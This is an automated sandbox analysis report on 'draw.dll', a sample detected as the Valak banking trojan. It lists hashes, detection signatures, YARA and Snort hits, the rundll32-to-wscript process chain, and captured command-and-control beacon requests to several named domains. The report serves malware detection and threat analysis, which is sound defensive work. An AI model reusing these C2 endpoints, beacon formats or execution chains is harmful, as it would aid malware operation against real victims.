
Windows Analysis Report
draw.dll

Overview

General Information

Sample Name: draw.dll
Analysis ID: 756451
MD5: 78e05075e686397097de69fb0402263e
SHA1: f3e9e7f321deb1a3408053168a6a67c6cd70e114
SHA256: 3769a84dbe7ba74ad7b0b355a864483d3562888a67806082ff094a56ce73bf7e
Tags: banker, dll, trojan

Detection

Valak
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Valak
Snort IDS alert for network traffic
Machine Learning detection for sample
Uses 32bit PE files
Yara signature match
PE file contains an invalid checksum
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Classification chart (legend only): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious
  • System is w10x64
  • loaddll32.exe (PID: 5220 cmdline: loaddll32.exe "C:\Users\user\Desktop\draw.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4020 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\draw.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6128 cmdline: rundll32.exe "C:\Users\user\Desktop\draw.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • wscript.exe (PID: 3680 cmdline: wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan MD5: 7075DD7B9BE8807FCA93ACD86F724884)
    • rundll32.exe (PID: 2016 cmdline: rundll32.exe C:\Users\user\Desktop\draw.dll,Productword9 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • wscript.exe (PID: 4252 cmdline: wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan MD5: 7075DD7B9BE8807FCA93ACD86F724884)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Source: C:\Users\Public\iVIwVADQD.eLxan | Rule: JoeSecurity_Allatori_Valak | Description: Yara detected Valak | Author: Joe Security
Source: C:\Users\Public\iVIwVADQD.eLxan | Rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery | Description: Detects JS potentially executing WMI queries | Author: ditekSHen
  • 0x1512:$ex: .ExecQuery(
  • 0x4318:$ex: .ExecQuery(
  • 0x143d:$s1: GetObject(
  • 0x4243:$s1: GetObject(
  • 0x990:$s2: String.fromCharCode(
  • 0x3796:$s2: String.fromCharCode(
  • 0x2825:$s3: ActiveXObject(
  • 0x29f1:$s3: ActiveXObject(
  • 0x562b:$s3: ActiveXObject(
  • 0x57f7:$s3: ActiveXObject(
  • 0x24fa:$s4: .Sleep(
  • 0x5300:$s4: .Sleep(
Source | Rule | Description | Author | Strings
Source: 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Allatori_Valak | Description: Yara detected Valak | Author: Joe Security
Source: 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Allatori_Valak | Description: Yara detected Valak | Author: Joe Security
Source: 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Allatori_Valak | Description: Yara detected Valak | Author: Joe Security
Source: 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Allatori_Valak | Description: Yara detected Valak | Author: Joe Security
Source: 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Allatori_Valak | Description: Yara detected Valak | Author: Joe Security
(26 entries in total; the remaining entries are not included in this extract)
Source | Rule | Description | Author | Strings
Source: 4.3.rundll32.exe.334a950.0.unpack | Rule: JoeSecurity_Allatori_Valak | Description: Yara detected Valak | Author: Joe Security
Source: 4.3.rundll32.exe.334a950.0.unpack | Rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery | Description: Detects JS potentially executing WMI queries | Author: ditekSHen
  • 0x10ae1:$ex: .ExecQuery(
  • 0x109fd:$s1: GetObject(
  • 0xffa7:$s2: String.fromCharCode(
  • 0x11e77:$s3: ActiveXObject(
  • 0x1205e:$s3: ActiveXObject(
  • 0x11b47:$s4: .Sleep(
Source: 0.3.loaddll32.exe.b0a950.0.raw.unpack | Rule: JoeSecurity_Allatori_Valak | Description: Yara detected Valak | Author: Joe Security
Source: 0.3.loaddll32.exe.b0a950.0.raw.unpack | Rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery | Description: Detects JS potentially executing WMI queries | Author: ditekSHen
  • 0x11ce1:$ex: .ExecQuery(
  • 0x11bfd:$s1: GetObject(
  • 0x111a7:$s2: String.fromCharCode(
  • 0x13077:$s3: ActiveXObject(
  • 0x1325e:$s3: ActiveXObject(
  • 0x12d47:$s4: .Sleep(
Source: 4.3.rundll32.exe.334a950.0.raw.unpack | Rule: JoeSecurity_Allatori_Valak | Description: Yara detected Valak | Author: Joe Security
(7 entries in total; the remaining entries are not included in this extract)
                    No Sigma rule has matched
Timestamp: 11/30/22-08:57:37.118787
Source IP: 192.168.2.3
Destination IP: 152.199.19.161
Source Port: 49702
Destination Port: 80
SID: 2842995
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/30/22-08:58:20.522210
Source IP: 192.168.2.3
Destination IP: 152.199.19.161
Source Port: 49703
Destination Port: 80
SID: 2842995
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/30/22-08:59:03.257622
Source IP: 192.168.2.3
Destination IP: 207.148.248.143
Source Port: 49706
Destination Port: 80
SID: 2842995
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/30/22-08:58:20.803397
Source IP: 192.168.2.3
Destination IP: 152.199.19.161
Source Port: 49704
Destination Port: 80
SID: 2842995
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/30/22-08:59:02.895059
Source IP: 192.168.2.3
Destination IP: 207.148.248.143
Source Port: 49705
Destination Port: 80
SID: 2842995
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/30/22-08:57:37.104764
Source IP: 192.168.2.3
Destination IP: 152.199.19.161
Source Port: 49701
Destination Port: 80
SID: 2842995
Protocol: TCP
Classtype: A Network Trojan was detected


                    AV Detection

Source: draw.dll | Avira: detected
Source: draw.dll | ReversingLabs: Detection: 82%
Source: draw.dll | Virustotal: Detection: 75%
Source: http://a-zcorner.com/ | Avira URL Cloud: Label: malware
Source: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3 | Avira URL Cloud: Label: malware
Source: http://d0d0f3d189430.com | Avira URL Cloud: Label: malware
Source: http://knockoutlights.com | Avira URL Cloud: Label: malware
Source: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3 | Avira URL Cloud: Label: malware
Source: http://a-zcorner.com | Avira URL Cloud: Label: malware
Source: http://d0d0abee1d18255e.com | Avira URL Cloud: Label: malware
Source: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJDVU1SSVYrMTcwUjExNzxgZ2p1Yzw0MGM1YDU1NDxrZ2I0Pzw1NDwyNT81&client=tarbneghyrdfwglztdpcknpjvzxbxtm&service_id=FE05211&ubwG=payxcvavvogx | Avira URL Cloud: Label: malware
Source: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bGV2YH4%2BQEFXT1BLVCkzNTJQMzM1Pk | Avira URL Cloud: Label: malware
Source: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3ExT05YQF9EWyY8Oj1fPDw6MU9OWEBfR | Avira URL Cloud: Label: malware
Source: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3U1S0pcRFtAXyI4PjlbODg%2BNUtKXER | Avira URL Cloud: Label: malware
Source: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=b | Avira URL Cloud: Label: malware
Source: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJD | Avira URL Cloud: Label: malware
Source: knockoutlights.com | Virustotal: Detection: 13%
Source: a-zcorner.com | Virustotal: Detection: 8%
Source: organicgreensfl.com | Virustotal: Detection: 5%
Source: draw.dll | Joe Sandbox ML: detected
Source: draw.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                    Source: Binary string: kbdusm.pdb source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\Month\ago\written\Weight\Root\vowel\FatOrder.pdb source: draw.dll
                    Source: Binary string: Wkbdusm.pdb source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp

                    Networking

Source: C:\Windows\SysWOW64\wscript.exe | Domain query: ec.atdmt.com
Source: C:\Windows\SysWOW64\wscript.exe | Network Connect: 207.148.248.143 80
Source: C:\Windows\SysWOW64\wscript.exe | Domain query: a-zcorner.com
Source: C:\Windows\SysWOW64\wscript.exe | Domain query: msnbot-207-46-194-33.search.msn.com
Source: C:\Windows\SysWOW64\wscript.exe | Domain query: knockoutlights.com
Source: Traffic | Snort IDS: 2842995 ETPRO TROJAN Win32/Valak v33 CnC Activity M1 192.168.2.3:49701 -> 152.199.19.161:80
Source: Traffic | Snort IDS: 2842995 ETPRO TROJAN Win32/Valak v33 CnC Activity M1 192.168.2.3:49702 -> 152.199.19.161:80
Source: Traffic | Snort IDS: 2842995 ETPRO TROJAN Win32/Valak v33 CnC Activity M1 192.168.2.3:49703 -> 152.199.19.161:80
Source: Traffic | Snort IDS: 2842995 ETPRO TROJAN Win32/Valak v33 CnC Activity M1 192.168.2.3:49704 -> 152.199.19.161:80
Source: Traffic | Snort IDS: 2842995 ETPRO TROJAN Win32/Valak v33 CnC Activity M1 192.168.2.3:49705 -> 207.148.248.143:80
Source: Traffic | Snort IDS: 2842995 ETPRO TROJAN Win32/Valak v33 CnC Activity M1 192.168.2.3:49706 -> 207.148.248.143:80
Source: global traffic | HTTP traffic detected:
  GET /rpc.aspx?winrm=2387&view2=classic&regclid=bGV2YH4%2BQEFXT1BLVCkzNTJQMzM1PkBBV09QS1QpMzUyUDMzNT5iZWh3YT42MmE3Yjc3Nj5pZWA2PT43Nj4wNz03&client=ixxppezciktqtwhxserbxnujcbfpqcn&service_id=FE04120&ubwG=tzuqeqskfsnk HTTP/1.1
  Accept: */*
  Accept-Language: en-us
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: knockoutlights.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJDVU1SSVYrMTcwUjExNzxgZ2p1Yzw0MGM1YDU1NDxrZ2I0Pzw1NDwyNT81&client=tarbneghyrdfwglztdpcknpjvzxbxtm&service_id=FE05211&ubwG=payxcvavvogx HTTP/1.1
  Accept: */*
  Accept-Language: en-us
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: knockoutlights.com
  Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: BIZLAND-SDUS BIZLAND-SDUS
Source: Joe Sandbox View | IP Address: 207.148.248.143 207.148.248.143
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 30 Nov 2022 07:59:02 GMT
  Server: Apache/2.4.6 (CentOS) PHP/5.6.8
  Content-Length: 206
  Content-Type: text/html; charset=iso-8859-1
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 70 63 2e 61 73 70 78 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rpc.aspx was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 30 Nov 2022 07:59:03 GMT
  Server: Apache/2.4.6 (CentOS) PHP/5.6.8
  Content-Length: 206
  Content-Type: text/html; charset=iso-8859-1
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 70 63 2e 61 73 70 78 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rpc.aspx was not found on this server.</p></body></html>
Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr | String found in binary or memory: http://a-zcorner.com
Source: wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://a-zcorner.com/
Source: wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3
Source: wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769679607.00000000051D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3ExT05YQF9EWyY8Oj1fPDw6MU9OWEBfR
Source: wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3
Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3U1S0pcRFtAXyI4PjlbODg%2BNUtKXER
Source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr | String found in binary or memory: http://az361816.vo.msecnd.net
Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://az361816.vo.msecnd.net/rpc.aspx?winrm=2387&view2=classic&regcl
Source: wscript.exe, 0000000C.00000003.617880772.0000000000849000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://az361816.vo.msecnd.net/rpc.aspx?winrm=2387&view2=classic&regclid=YGl6bHIyTE1bQ1xHWCU%2FOT5cPz
Source: wscript.exe, 00000010.00000003.614982319.00000000007B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://az361816.vo.msecnd.net/rpc.aspx?winrm=2387&view2=classic&regclid=YWh7bXMzTUxaQl1GWSQ%2BOD9dPj
Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://az361816.vo.msecnd.netS
Source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr | String found in binary or memory: http://d0d0abee1d18255e.com
Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://d0d0abee1d18255e.comXN
Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr | String found in binary or memory: http://d0d0f3d189430.com
Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr | String found in binary or memory: http://ec.atdmt.com
Source: wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ec.atdmt.com/
Source: wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ec.atdmt.com/194-33.search.msn.com/
Source: wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ec.atdmt.com/W
Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=YGl6bHI
Source: wscript.exe, 0000000C.00000003.753900638.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769313214.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=YGl6bHIyTE1bQ1xHWCU%2FOT5cPz85MkxNW0Nc
Source: wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=ZG1%2Ba
Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=ZG1%2BaHY2SElfR1hDXCE7PTpYOzs9NkhJX0dY
Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr | String found in binary or memory: http://knockoutlights.com
Source: wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=b
Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bGV2YH4%2BQEFXT1BLVCkzNTJQMzM1Pk
Source: wscript.exe, 0000000C.00000002.769378758.000000000089F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJD
Source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769445270.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr | String found in binary or memory: http://msnbot-207-46-194-33.search.msn.com
Source: wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msnbot-207-46-194-33.search.msn.com/
Source: wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msnbot-207-46-194-33.search.msn.com/G
Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msnbot-207-46-194-33.search.msn.com/rpc.aspx?winrm=2387&view2=
Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msnbot-207-46-194-33.search.msn.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3ExT05YQF9
